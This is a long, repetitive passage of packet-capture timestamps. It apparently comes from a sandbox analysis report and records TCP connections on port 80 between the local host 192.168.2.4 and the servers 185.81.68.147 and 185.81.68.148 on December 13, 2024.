                                                              Dec 13, 2024 07:47:07.426434040 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.426507950 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.427390099 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.427424908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.427468061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.427468061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.428472996 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.428507090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.428669930 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.429135084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.429167986 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.429186106 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.429217100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.429815054 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.430006981 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.430181980 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.430619955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.430761099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.430808067 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.430865049 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.431576014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.431612015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.431663036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.431663036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.432318926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.432476997 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.432527065 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.433233976 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.433330059 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.452784061 CET8049739185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:07.452816963 CET8049737185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:07.453155994 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:07.453155994 CET4973980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:07.453156948 CET4973980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:07.467588902 CET8049740185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.468673944 CET4974080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.468719006 CET8049736185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.468822002 CET4974080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.468898058 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.573353052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.573406935 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.573447943 CET8049739185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:07.573455095 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.573479891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.573519945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.573570013 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.574512959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.574548960 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.574580908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.574593067 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.575031996 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.575067043 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.575114965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.575114965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.575818062 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.575880051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.576004982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.576066971 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.576594114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.576894045 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.576946020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.577902079 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.577936888 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.577953100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.577981949 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.579194069 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.579227924 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.579262972 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.579298973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.579304934 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.579304934 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.579366922 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.579966068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.580018044 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.580060005 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.580365896 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.581295967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.581331015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.581378937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.581378937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.582604885 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.582639933 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.582669020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.582675934 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.582698107 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.582710028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.582742929 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.582756042 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.583370924 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.583429098 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.583488941 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.583547115 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.584259033 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.584314108 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.584439039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.584487915 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.585426092 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.585460901 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.585510969 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.585510969 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.587023973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587057114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587083101 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.587093115 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587125063 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.587129116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587153912 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.587171078 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.587907076 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587940931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.587977886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.588063955 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.589329958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.589363098 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.589402914 CET8049740185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.589411020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.589411020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.589432955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.589468956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.589517117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.591145039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.591180086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.591202021 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.591214895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.591229916 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.591250896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.591267109 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.591330051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.592164993 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.592200994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.592874050 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.592962027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.592995882 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.593038082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.593038082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.593693018 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.593727112 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.593749046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.593806982 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.594779968 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.594815969 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.594826937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.594871998 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.595407009 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.595441103 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.595489025 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.595489025 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.596443892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.596477985 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.596533060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.597016096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.597074032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.598489046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.598522902 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.598540068 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.598561049 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.598567963 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.598877907 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.599013090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.599046946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.599087000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.599087000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.599560976 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.599616051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.600219965 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.600281954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.600693941 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.600728989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.600789070 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.601309061 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.601344109 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.601392031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.601392031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.602359056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.602394104 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.602415085 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.602499008 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.603400946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.603436947 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.603494883 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.603494883 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.603904009 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.603939056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.604909897 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.604954958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.604990959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.605036974 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.605036974 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.605379105 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.605999947 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.606060982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.606306076 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.606401920 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.606437922 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.606462002 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.606483936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.607095003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.607151985 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.607374907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.607578993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.608006001 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.608074903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.609735966 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.609775066 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.609808922 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.609846115 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.609863997 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.609863997 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.609879971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.609894991 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.611332893 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.611397028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.611429930 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.611464977 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.611476898 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.611476898 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.612335920 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.612406015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.612438917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.612473011 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.612502098 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.612531900 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.613276005 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.613310099 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.613331079 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.613969088 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.614003897 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.614016056 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.614038944 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.614059925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.615128040 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.615161896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.615183115 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.615216017 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.615650892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.615685940 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.615712881 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.615786076 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.616689920 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.616724014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.616821051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.619369984 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.619430065 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.767680883 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.767904997 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.767908096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.767966986 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.768114090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.768150091 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.768160105 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.768224001 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.768899918 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.768959999 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.769179106 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.769305944 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.769423008 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.769510031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.769990921 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.770037889 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.770159006 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.770210981 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.771040916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.771075010 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.771123886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.771123886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.771727085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.771802902 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.771933079 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.772061110 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.772543907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.772597075 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.772708893 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.772778988 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.773607016 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.773641109 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.773662090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.773682117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.774223089 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.774315119 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.774601936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.774709940 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.775300026 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.775355101 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.775413036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.775986910 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.776082039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.776122093 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.776189089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.776829958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.776945114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.777013063 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.777859926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.777894020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.777910948 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.777987003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.778587103 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.778655052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.778707981 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.779093981 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.779593945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.779650927 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.779706001 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.779865026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.780453920 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.780487061 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.780514002 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.780590057 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.781176090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.781209946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.781258106 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.781258106 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.781949043 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.782052994 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.782185078 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.782293081 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.782814980 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.782849073 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.782879114 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.783206940 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.783581018 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.783638000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.783699989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.783756971 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.784658909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.784693003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.784746885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.785403013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.785444021 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.785501957 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.785501957 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.786787987 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.786823034 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.786870003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.786870003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.787111044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.787144899 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.787161112 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.787199020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.787872076 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.788110971 CET4973880192.168.2.4185.81.68.147
